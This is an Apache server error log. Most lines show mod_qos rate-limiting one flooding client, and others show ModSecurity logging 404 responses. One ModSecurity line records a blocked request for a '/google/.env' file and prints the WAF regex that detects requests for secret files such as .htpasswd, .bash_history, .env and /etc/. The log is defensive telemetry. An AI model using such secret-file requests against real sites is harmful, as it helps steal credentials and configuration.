[Tue May 26 19:54:52.069212 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNGDRMqfxdEDkoszUHQAAABI
[Tue May 26 19:54:52.070376 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:60140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHbgAAAMo
[Tue May 26 19:54:52.070510 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHbwAAAMI
[Tue May 26 19:54:52.075988 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:60150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHcAAAAPo
[Tue May 26 19:54:52.215505 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHcwAAANM
[Tue May 26 19:54:52.217993 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MVwAAAdM
[Tue May 26 19:54:52.217997 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHdAAAALI
[Tue May 26 19:54:52.220396 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHdgAAAP8
[Tue May 26 19:54:52.220560 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MWAAAAbM
[Tue May 26 19:54:52.220873 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:60140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHdwAAAK0
[Tue May 26 19:54:52.222318 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNGDRMqfxdEDkoszUIAAAACM
[Tue May 26 19:54:52.223904 2026] [qos:error] [pid 86490:tid 86724] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHeAAAAO0
[Tue May 26 19:54:52.228900 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:60150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHeQAAAOc
[Tue May 26 19:54:52.279828 2026] [security2:error] [pid 86490:tid 86634] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG8wAAAJM"]
[Tue May 26 19:54:52.288591 2026] [security2:error] [pid 86490:tid 86731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG4AAAAPQ"]
[Tue May 26 19:54:52.289016 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG4gAAAI0"]
[Tue May 26 19:54:52.289179 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG9QAAAMU"]
[Tue May 26 19:54:52.289281 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMkqK9k_ZUB2Vp25MBQAAAeg"]
[Tue May 26 19:54:52.291824 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMmDRMqfxdEDkoszT2AAAADw"]
[Tue May 26 19:54:52.292041 2026] [security2:error] [pid 86490:tid 86641] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG5AAAAJo"]
[Tue May 26 19:54:52.293115 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG8gAAAPU"]
[Tue May 26 19:54:52.305059 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMkqK9k_ZUB2Vp25MBwAAAd8"]
[Tue May 26 19:54:52.307749 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMmDRMqfxdEDkoszT1wAAAAA"]
[Tue May 26 19:54:52.313685 2026] [security2:error] [pid 86490:tid 86658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG7QAAAKs"]
[Tue May 26 19:54:52.319982 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMkqK9k_ZUB2Vp25MBAAAAZE"]
[Tue May 26 19:54:52.324004 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMmDRMqfxdEDkoszT4QAAABc"]
[Tue May 26 19:54:52.325110 2026] [security2:error] [pid 86490:tid 86690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG-wAAAMs"]
[Tue May 26 19:54:52.333986 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMmDRMqfxdEDkoszT2wAAAFE"]
[Tue May 26 19:54:52.339372 2026] [security2:error] [pid 86490:tid 86680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG_AAAAME"]
[Tue May 26 19:54:52.340430 2026] [security2:error] [pid 86490:tid 86738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG_gAAAPs"]
[Tue May 26 19:54:52.346551 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszT9AAAAEU"]
[Tue May 26 19:54:52.377377 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMmDRMqfxdEDkoszT4AAAAGI"]
[Tue May 26 19:54:52.382737 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMmDRMqfxdEDkoszT2QAAAA4"]
[Tue May 26 19:54:52.396946 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszT_wAAAH8"]
[Tue May 26 19:54:52.400412 2026] [security2:error] [pid 93868:tid 94343] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MPQAAAeQ"]
[Tue May 26 19:54:52.402097 2026] [security2:error] [pid 86490:tid 86730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LHGgAAAPM"]
[Tue May 26 19:54:52.404194 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszUAAAAAC8"]
[Tue May 26 19:54:52.411968 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MNgAAAcE"]
[Tue May 26 19:54:52.414790 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszT8QAAAA8"]
[Tue May 26 19:54:52.420745 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszT_gAAAFM"]
[Tue May 26 19:54:52.421749 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MLQAAAeI"]
[Tue May 26 19:54:52.422314 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszT-AAAAFA"]
[Tue May 26 19:54:52.424955 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MNwAAAfQ"]
[Tue May 26 19:54:52.425081 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszT9gAAABw"]
[Tue May 26 19:54:52.442209 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MQgAAAek"]
[Tue May 26 19:54:52.565246 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtNGDRMqfxdEDkoszUQwAAAHQ
[Tue May 26 19:54:52.573277 2026] [qos:error] [pid 93868:tid 94318] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtNEqK9k_ZUB2Vp25MewAAAcs
[Tue May 26 19:54:52.575560 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNGDRMqfxdEDkoszURQAAAHs
[Tue May 26 19:54:52.576428 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:49424] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHowAAAPQ
[Tue May 26 19:54:52.576571 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MfQAAAdk
[Tue May 26 19:54:52.577047 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHpAAAAKU
[Tue May 26 19:54:52.577053 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtNGDRMqfxdEDkoszURgAAAEE
[Tue May 26 19:54:52.593422 2026] [qos:error] [pid 93868:tid 94360] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MfwAAAfU
[Tue May 26 19:54:52.594122 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:60100] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHpgAAAMU
[Tue May 26 19:54:52.718765 2026] [qos:error] [pid 93868:tid 94299] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MgAAAAbg
[Tue May 26 19:54:52.723500 2026] [qos:error] [pid 93868:tid 94291] [client 45.148.10.120:60084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MgQAAAbA
[Tue May 26 19:54:52.724656 2026] [qos:error] [pid 86490:tid 86694] [client 45.148.10.120:49424] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHpwAAAM8
[Tue May 26 19:54:52.727835 2026] [qos:error] [pid 93868:tid 94346] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MggAAAec
[Tue May 26 19:54:52.729817 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNGDRMqfxdEDkoszUSgAAAHU
[Tue May 26 19:54:52.731295 2026] [qos:error] [pid 93868:tid 94286] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MgwAAAas
[Tue May 26 19:54:52.741951 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MhAAAAac
[Tue May 26 19:54:52.749063 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:60100] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHqgAAAOg
[Tue May 26 19:54:52.822242 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:60178] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHrAAAAOs
[Tue May 26 19:54:52.872084 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MhQAAAbY
[Tue May 26 19:54:52.872744 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:49424] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHrQAAALU
[Tue May 26 19:54:52.873551 2026] [qos:error] [pid 93868:tid 94364] [client 45.148.10.120:60084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MhgAAAfk
[Tue May 26 19:54:52.880559 2026] [qos:error] [pid 93868:tid 94327] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MhwAAAdQ
[Tue May 26 19:54:52.884172 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNGDRMqfxdEDkoszUTQAAAE4
[Tue May 26 19:54:52.888751 2026] [qos:error] [pid 93868:tid 94322] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MiAAAAc8
[Tue May 26 19:54:52.892728 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MiQAAAgg
[Tue May 26 19:54:52.904685 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:60100] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHrgAAAPU
[Tue May 26 19:54:52.975331 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:60178] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHrwAAAKY
[Tue May 26 19:54:53.020280 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:49424] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LHsAAAALE
[Tue May 26 19:54:53.023022 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:60084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MigAAAgQ
[Tue May 26 19:54:53.025140 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MiwAAAdE
[Tue May 26 19:54:53.036529 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MjAAAAfI
[Tue May 26 19:54:53.039208 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNWDRMqfxdEDkoszUTwAAABQ
[Tue May 26 19:54:53.043259 2026] [qos:error] [pid 93868:tid 94277] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MjQAAAaI
[Tue May 26 19:54:53.043310 2026] [qos:error] [pid 93868:tid 94285] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MjgAAAao
[Tue May 26 19:54:53.045074 2026] [qos:error] [pid 93868:tid 94278] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MjwAAAaM
[Tue May 26 19:54:53.059566 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:60100] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LHsQAAAPY
[Tue May 26 19:54:53.127786 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:60178] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LHsgAAAIc
[Tue May 26 19:54:53.149579 2026] [security2:error] [pid 93576:tid 93751] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/google/.env"] [unique_id "ahWtNWDRMqfxdEDkoszUUAAAACc"]
[Tue May 26 19:54:53.168286 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:49424] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LHtAAAAKo
[Tue May 26 19:54:53.171566 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:60084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MkQAAAZM
[Tue May 26 19:54:53.177861 2026] [qos:error] [pid 93868:tid 94309] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MkgAAAcI
[Tue May 26 19:54:53.188283 2026] [qos:error] [pid 93868:tid 94259] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MkwAAAZA
[Tue May 26 19:54:53.192216 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MlAAAAdM
[Tue May 26 19:54:53.193493 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNWDRMqfxdEDkoszUUQAAABU
[Tue May 26 19:54:53.196432 2026] [qos:error] [pid 93868:tid 94292] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MlQAAAbE
[Tue May 26 19:54:53.197733 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MlgAAAZ4
[Tue May 26 19:54:53.215145 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:60100] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LHtQAAAPw
